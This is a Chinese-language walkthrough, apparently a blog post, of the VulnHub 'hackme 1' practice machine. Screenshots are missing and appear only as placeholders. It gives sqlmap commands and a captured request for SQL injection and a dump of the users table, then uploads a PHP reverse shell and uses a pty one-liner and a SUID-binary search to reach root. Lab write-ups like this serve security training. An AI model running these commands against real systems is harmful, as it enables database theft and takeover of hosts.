下载地址:https://www.vulnhub.com/entry/hackme-1,330/

在这里插入图片描述

信息搜集

获取IP地址

在这里插入图片描述

扫描端口

在这里插入图片描述

80端口

首页是一个登录页面
在这里插入图片描述
发现有注册页面,注册一个账号admin:password,并且登录成功
在这里插入图片描述
登录成功之后的页面,是一个查阅图书的页面
在这里插入图片描述
尝试使用SQL注入

1
sqlmap -r sqlmap.txt  --batch

在这里插入图片描述
sqlmap.txt里面的内容,通过抓包获取的
在这里插入图片描述

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
sqlmap.txt

POST /welcome.php HTTP/1.1
Host: 192.168.1.150
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://192.168.1.150
Connection: close
Referer: http://192.168.1.150/welcome.php
Cookie: PHPSESSID=r0chapo33qtu1kt7qtv9rolpkg
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

search=1

看到是存在注入的
注入爆出数据库

1
sqlmap -r sqlmap.txt  --batch --dbs

在这里插入图片描述
在webapphacking数据库里面得到了我们想要的信息

1
sqlmap -r sqlmap.txt  --batch -D webapphacking --tables --batch

在这里插入图片描述

1
sqlmap -r sqlmap.txt  --batch -D webapphacking -T users --dump --batch

在这里插入图片描述
在这里我们看到它有很有个用户名密码,有一个超级管理员用户superadmin
superadmin用户的密码需要在在线网站解一下

1
解密网站:https://www.somd5.com/

在这里插入图片描述

反弹shell

使用用户名:superadmin密码:Uncrackable登录得到一个上传页面
在这里插入图片描述
尝试上传一个php文件,发现可以上传
在这里插入图片描述
上传一个反弹shell的PHP文件,上传成功
在这里插入图片描述
在这里插入图片描述
kali开启监听
在这里插入图片描述
浏览器访问php-reverse-shell.php
在这里插入图片描述
监听成功,成功拿到shell
在这里插入图片描述

提权

使用python打开bash的shell

1
python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
使用find命令查找具有SUID权限的二进制文件

1
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
在这里发现/home/legacy/touchmenot含有SUID的权限
执行该文件发现已经获取了root权限
在这里插入图片描述
到这里成功完成了该靶机!